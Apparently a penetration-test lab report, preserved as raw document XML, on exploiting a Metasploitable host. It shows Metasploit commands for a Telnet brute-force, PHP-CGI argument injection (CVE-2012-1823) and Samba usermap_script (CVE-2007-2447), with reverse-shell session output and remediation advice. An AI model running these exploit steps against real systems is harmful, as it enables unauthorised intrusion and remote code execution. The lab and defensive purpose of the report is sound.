      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="9280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2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use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5748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6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auxiliary/scanner/telnet/telnet_login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3" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8599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RHOSTS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192.168.50.3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8484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USER_FILE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user.txt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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8484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PASS_FILE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pass.txt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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7231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STOP_ON_SUCCESS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true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exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="394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9" coordorigin="1080,14553" coordsize="9373,10" o:spt="12" path="m1080,14558l10453,14558">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 449" type="Shape 449" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3864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15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6" w:name="16"/>
    <w:bookmarkEnd w:id="16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5,1090" coordsize="9363,2257" o:spt="12" path="m1095,1090l10458,1090l10458,3347l1095,3347">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 58" type="Shape 58" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:114.83pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:-251657496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9" coordorigin="1080,1090" coordsize="29,2257" o:spt="12" path="m1095,1090l1095,3347">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 219" type="Shape 219" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:114.83pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3826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0" coordorigin="1080,1080" coordsize="9373,10" o:spt="12" path="m1080,1085l10453,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 220" type="Shape 220" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3827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1" coordorigin="10453,1080" coordsize="10,2266" o:spt="12" path="m10458,1080l10458,3347">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 221" type="Shape 221" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:115.31pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3830" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="313" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="552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[+]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Login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Successful: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msfadmin:msfadmin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Upgrade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shell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Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="217" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8483"/>
        <w:jc w:val="both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6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sessions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-u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1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6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sessions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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2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2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sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3735"/>
        </w:tabs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Computer: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metasploitable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ab/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OS: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Ubuntu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8.04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(Linux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2.6.24)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2" coordorigin="1080,3347" coordsize="9373,10" o:spt="12" path="m1080,3351l10453,3351">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 222" type="Shape 222" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3834" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="365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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="107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20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Impact: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Remote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shell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access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credential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theft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risk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any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shared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network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="69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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Fix: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Disable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Telnet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immediately.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Use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SSH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exclusively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remote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administration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="64" w:after="0" w:line="227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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Harden: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Block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port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23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firewall.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Apply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network-level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packet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inspection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="495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0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="268" w:after="0" w:line="268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0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4.4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Port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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="71"/>
          <w:noProof/>
        </w:rPr>
        <w:t>—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HTTP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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>(PHP-CGI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Argument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Injection)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87" coordorigin="1052,6175" coordsize="10141,10" o:spt="12" path="m1052,6180l11193,6180">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 487" type="Shape 487" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3838" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="364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32" w:space="0" w:color="E63946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002"/>
        <w:gridCol w:w="3683"/>
        <w:gridCol w:w="3678"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="386" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="E63946"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="E63946" w:color="000000" w:val="clear"/>
            <w:tcW w:w="2002" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="6" w:after="0" w:line="221" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="0"/>
              <w:jc w:val="center"/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34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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3683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Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:color w:val="#4A5568"/>
                <w:spacing w:val="5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CVSS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Score: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4A5568"/>
                <w:spacing w:val="2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3678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2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3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE: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7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CVE-2012-1823</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="422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Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="74" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="320"/>
        <w:jc w:val="left"/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Apache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2.2.8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runs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PHP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CGI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mode.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PHP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versions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up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5.3.12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5.4.2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are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vulnerable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an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argument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injection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flaw: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when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no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unescaped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'='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present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query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string,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split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'+'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characters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passed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as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arguments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CGI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binary.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5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flag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can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then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be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used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set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php.ini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directives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and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achieve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arbitrary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code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execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="38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2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Exploitation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Metasploit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12" coordorigin="1095,9843" coordsize="9363,4845" o:spt="12" path="m1095,9843l10458,9843l10458,14688l1095,14688">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 812" type="Shape 812" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:244.24pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:-251657437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62" coordorigin="1080,9843" coordsize="29,4845" o:spt="12" path="m1095,9843l1095,14688">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1162" type="Shape 1162" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:244.24pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3897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63" coordorigin="1080,9833" coordsize="9373,10" o:spt="12" path="m1080,9838l10453,9838">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1163" type="Shape 1163" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:25pt;mso-position-vertical-relative:paragraph;z-index:3898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64" coordorigin="10453,9833" coordsize="10,4854" o:spt="12" path="m10458,9833l10458,14688">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1164" type="Shape 1164" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:244.72pt;mso-position-horizontal-relative:page;margin-top:25pt;mso-position-vertical-relative:paragraph;z-index:3901" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="228" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7347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Identify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HTTP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service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nmap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-sV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-p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80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="4039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80/tcp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open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http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Apache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httpd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2.2.8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(Ubuntu)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DAV/2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5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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Load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exploit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module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="9280"/>
        <w:jc w:val="both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2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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7572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6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php_cgi_arg_injection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1" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5407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use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exploit/multi/http/php_cgi_arg_injection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exploit(php_cgi_arg_injection)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871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-7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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>RHOSTS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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5747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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>exploit(php_cgi_arg_injection)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2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LHOST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192.168.50.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5747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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>exploit(php_cgi_arg_injection)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2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exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265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65" coordorigin="1080,14688" coordsize="9373,10" o:spt="12" path="m1080,14692l10453,14692">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1165" type="Shape 1165" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:390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16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7" w:name="17"/>
    <w:bookmarkEnd w:id="17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5,1090" coordsize="9363,2045" o:spt="12" path="m1095,1090l10458,1090l10458,3135l1095,3135">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 58" type="Shape 58" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:104.27pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:-251657496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79" coordorigin="1080,1090" coordsize="29,2045" o:spt="12" path="m1095,1090l1095,3135">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 279" type="Shape 279" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:104.27pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3825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0" coordorigin="1080,1080" coordsize="9373,10" o:spt="12" path="m1080,1085l10453,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 280" type="Shape 280" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3826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1" coordorigin="10453,1080" coordsize="10,2055" o:spt="12" path="m10458,1080l10458,3135">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 281" type="Shape 281" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:104.75pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3829" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="345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Started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reverse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TCP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handler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on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192.168.50.2:4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="1532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opened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(192.168.50.2:4444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-&gt;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192.168.50.3:38795)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sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="8" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="3922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Computer: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metasploitable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2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OS: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Linux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2.6.24-16-server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getuid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Server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username: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www-data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2" coordorigin="1080,3135" coordsize="9373,10" o:spt="12" path="m1080,3140l10453,3140">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 282" type="Shape 282" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-4pt;mso-position-vertical-relative:paragraph;z-index:3833" filled="f" stroked="t" strokeweight="0.48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3" coordorigin="1090,3567" coordsize="10065,7846" o:spt="12" path="m1090,3567l11155,3567l11155,11413l1090,11413">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 283" type="Shape 283" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:394.28pt;mso-position-horizontal-relative:page;margin-top:6pt;mso-position-vertical-relative:paragraph;z-index:-251657475" filled="t" fillcolor="#F0FAFF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4" coordorigin="1078,3558" coordsize="14,7855" o:spt="12" path="m1085,3558l1085,11413">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 284" type="Shape 284" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:394.76pt;mso-position-horizontal-relative:page;margin-top:5pt;mso-position-vertical-relative:paragraph;z-index:3839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5" coordorigin="1095,3555" coordsize="10050,14" o:spt="12" path="m1095,3563l11145,3563">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 285" type="Shape 285" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:5pt;mso-position-vertical-relative:paragraph;z-index:3841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6" coordorigin="11143,3558" coordsize="14,7855" o:spt="12" path="m11150,3558l11150,11413">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 286" type="Shape 286" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:394.76pt;mso-position-horizontal-relative:page;margin-top:5pt;mso-position-vertical-relative:paragraph;z-index:-251657469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372.00pt;z-index:3853;mso-position-horizontal-relative:page;margin-top:4pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_rfRV" o:title="Image136"/>
          </v:shape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7" coordorigin="1095,11411" coordsize="10050,14" o:spt="12" path="m1095,11418l11145,11418">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 287" type="Shape 287" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:2pt;mso-position-vertical-relative:paragraph;z-index:3849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5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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="76" w:after="0" w:line="260" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="1113"/>
        <w:jc w:val="left"/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111"/>
          <w:noProof/>
        </w:rPr>
        <w:t>• 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20"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Impact: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Remote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Code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Execution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www-data.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Can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pivot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full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local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privilege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escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="59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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Fix: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Upgrade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PHP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non-vulnerable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version.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Upgrade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Apache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current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release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="27" w:after="0" w:line="260" w:lineRule="exact"/>
        <w:ind w:firstLine="-360" w:left="1080" w:right="846"/>
        <w:jc w:val="left"/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111"/>
          <w:noProof/>
        </w:rPr>
        <w:t>• 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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Harden: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Disable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PHP-CGI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mode;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use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PHP-FPM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instead.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Deploy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WAF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filter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malicious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query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="1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strings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="59" w:after="0" w:line="227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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Principles: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Run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web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under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minimal-privilege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account.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Enable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HTTPS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(port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443).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64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17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8" w:name="18"/>
    <w:bookmarkEnd w:id="18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200" w:after="0" w:line="26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60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4.5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Port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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>445</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:color w:val="#1B3A5C"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="71"/>
          <w:noProof/>
        </w:rPr>
        <w:t>—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SMB/Samba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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>(usermap_script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RCE)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7" coordorigin="1052,1378" coordsize="10141,10" o:spt="12" path="m1052,1383l11193,1383">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 97" type="Shape 97" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:22pt;mso-position-vertical-relative:paragraph;z-index:3816" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="0" w:line="26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60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364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32" w:space="0" w:color="E63946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002"/>
        <w:gridCol w:w="3683"/>
        <w:gridCol w:w="3678"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="386" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="E63946"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="E63946" w:color="000000" w:val="clear"/>
            <w:tcW w:w="2002" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="6" w:after="0" w:line="221" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="0"/>
              <w:jc w:val="center"/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34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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3683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Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:color w:val="#4A5568"/>
                <w:spacing w:val="2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CVSS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Score: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4A5568"/>
                <w:spacing w:val="1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="221" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="156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2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3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE: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7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CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="422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Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="75" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="342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Samba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3.0.20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through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3.0.25rc3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contains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flaw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6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configuration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option.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When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configured,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shell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metacharacters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can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be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embedded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within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username,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causing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Samba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daemon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execute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arbitrary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commands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as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root.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No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authentication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is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required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="38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2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Exploitation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Metasploit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7" coordorigin="1095,4797" coordsize="9363,5915" o:spt="12" path="m1095,4797l10458,4797l10458,10712l1095,10712">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 357" type="Shape 357" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:297.75pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:-251657459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87" coordorigin="1080,4797" coordsize="29,5915" o:spt="12" path="m1095,4797l1095,10712">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 887" type="Shape 887" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:297.75pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3880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88" coordorigin="1080,4787" coordsize="9373,10" o:spt="12" path="m1080,4792l10453,4792">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 888" type="Shape 888" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3881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89" coordorigin="10453,4787" coordsize="10,5925" o:spt="12" path="m10458,4787l10458,10712">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 889" type="Shape 889" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:298.23pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3884" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="232" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7347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Confirm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Samba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version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19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nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="871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-7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>-sV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10"/>
          <w:noProof/>
        </w:rPr>
        <w:t>-p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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>445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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="1988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-3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445/tcp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netbios-ssn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Samba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smbd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3.X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-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4.X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(workgroup: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WORKGROUP)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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Load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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>and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configure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exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="9280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2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use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6089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exploit/multi/samba/usermap_script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exploit(usermap_script)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871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-7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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>RHOSTS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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6544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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>exploit(usermap_script)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LHOST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="19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192.168.50.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
